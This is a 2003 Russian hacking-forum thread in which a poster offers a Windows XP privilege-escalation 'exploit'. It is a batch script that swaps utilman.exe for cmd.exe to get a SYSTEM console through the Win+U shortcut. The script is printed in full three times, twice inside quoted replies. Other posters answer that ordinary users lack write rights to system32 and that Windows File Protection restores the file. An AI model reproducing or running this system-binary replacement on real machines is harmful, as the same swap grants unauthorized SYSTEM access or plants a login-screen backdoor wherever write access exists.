Легенда:
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
|
Очередной эксплоит WinXP 12.02.03 21:17 Число просмотров: 5805
Автор: lem0n Статус: Незарегистрированный пользователь
|
Согласен со ЗлымШаманом. У Everyone права в %SYSTEMROOT% и ниже только на уровне "READ" и "READ and EXECUTE".
Также, Windows FIle Protection сервис моментально начнет верещать и скопирует UTILMAN.EXE из system32\dllcache обратно вместо переименyованного.
> Играясь в Винде ЭксПи с utility manager > (\system32\utilman.exe; это такая прога, вызываемая > WinKey+U, предназаначеная для всякого рода инвалидов, меня > в ней интересовали mousekeys - контроль курсора мышки с > клавы), я обнаружил следующую вещь: > при нажатии Win+U запускается 2 utilman'a: один с правами > текущего пользователя, второй - угадайте - правильно, с > правами SYSTEM. > Отсюда вытекает эксплоит с классической подменой exe-шника: > > rem --- XPloit.utilman.bat
> -------------------------------------------
> @echo off
> echo WinXP Utility manager exploit. Copyleft (c) Sashman,
> 2003.
> echo Make sure utilman.exe is not runing.
> %systemdrive%
> cd %windir%\system32\
> echo Renaming utilman.exe to utilman.exp...
> ren utilman.exe utilman.exp
> echo Copying cmd.exe to utilman.exe...
> copy cmd.exe utilman.exe
> echo Press WinKey-U to obtain a console with SYSTEM
> privileges.
> echo After you're finished, press a key to restore utilman.
> pause>>nul
> del utilman.exe
> echo Renaming utilman.exp to utilman.exe...
> ren utilman.exp utilman.exe
> echo Good bye.
> rem ------------- cut here
> ------------------------------------------
>
> > Правда, есть один нюанс: консоль с системными правами НЕ > появляется у юзера с админскими правами, хотя и присутсвует > в списке процессов. > (У обычных пользователей она, родимая, появляется, со всеми > вытекающими последствиями :) ).
|
<hacking>
|
Очередной эксплоит WinXP 12.02.03 15:35
Автор: Sashman Статус: Незарегистрированный пользователь
|
Играясь в Винде ЭксПи с utility manager (\system32\utilman.exe; это такая прога, вызываемая WinKey+U, предназаначеная для всякого рода инвалидов, меня в ней интересовали mousekeys - контроль курсора мышки с клавы), я обнаружил следующую вещь:
при нажатии Win+U запускается 2 utilman'a: один с правами текущего пользователя, второй - угадайте - правильно, с правами SYSTEM.
Отсюда вытекает эксплоит с классической подменой exe-шника:
rem --- XPloit.utilman.bat -------------------------------------------
@echo off
echo WinXP Utility manager exploit. Copyleft (c) Sashman, 2003.
echo Make sure utilman.exe is not runing.
%systemdrive%
cd %windir%\system32\
echo Renaming utilman.exe to utilman.exp...
ren utilman.exe utilman.exp
echo Copying cmd.exe to utilman.exe...
copy cmd.exe utilman.exe
echo Press WinKey-U to obtain a console with SYSTEM privileges.
echo After you're finished, press a key to restore utilman.
pause>>nul
del utilman.exe
echo Renaming utilman.exp to utilman.exe...
ren utilman.exp utilman.exe
echo Good bye.
rem ------------- cut here ------------------------------------------
Правда, есть один нюанс: консоль с системными правами НЕ появляется у юзера с админскими правами, хотя и присутсвует в списке процессов.
(У обычных пользователей она, родимая, появляется, со всеми вытекающими последствиями :) ).
|
|
Очередной эксплоит WinXP 12.02.03 21:17
Автор: lem0n Статус: Незарегистрированный пользователь
|
Согласен со ЗлымШаманом. У Everyone права в %SYSTEMROOT% и ниже только на уровне "READ" и "READ and EXECUTE".
Также, Windows FIle Protection сервис моментально начнет верещать и скопирует UTILMAN.EXE из system32\dllcache обратно вместо переименyованного.
> Играясь в Винде ЭксПи с utility manager > (\system32\utilman.exe; это такая прога, вызываемая > WinKey+U, предназаначеная для всякого рода инвалидов, меня > в ней интересовали mousekeys - контроль курсора мышки с > клавы), я обнаружил следующую вещь: > при нажатии Win+U запускается 2 utilman'a: один с правами > текущего пользователя, второй - угадайте - правильно, с > правами SYSTEM. > Отсюда вытекает эксплоит с классической подменой exe-шника: > > rem --- XPloit.utilman.bat
> -------------------------------------------
> @echo off
> echo WinXP Utility manager exploit. Copyleft (c) Sashman,
> 2003.
> echo Make sure utilman.exe is not runing.
> %systemdrive%
> cd %windir%\system32\
> echo Renaming utilman.exe to utilman.exp...
> ren utilman.exe utilman.exp
> echo Copying cmd.exe to utilman.exe...
> copy cmd.exe utilman.exe
> echo Press WinKey-U to obtain a console with SYSTEM
> privileges.
> echo After you're finished, press a key to restore utilman.
> pause>>nul
> del utilman.exe
> echo Renaming utilman.exp to utilman.exe...
> ren utilman.exp utilman.exe
> echo Good bye.
> rem ------------- cut here
> ------------------------------------------
>
> > Правда, есть один нюанс: консоль с системными правами НЕ > появляется у юзера с админскими правами, хотя и присутсвует > в списке процессов. > (У обычных пользователей она, родимая, появляется, со всеми > вытекающими последствиями :) ).
|
|
Посмотри разрешения на system32 и расслабься 12.02.03 16:00
Автор: ZloyShaman <ZloyShaman> Статус: Elderman
|
|
|
|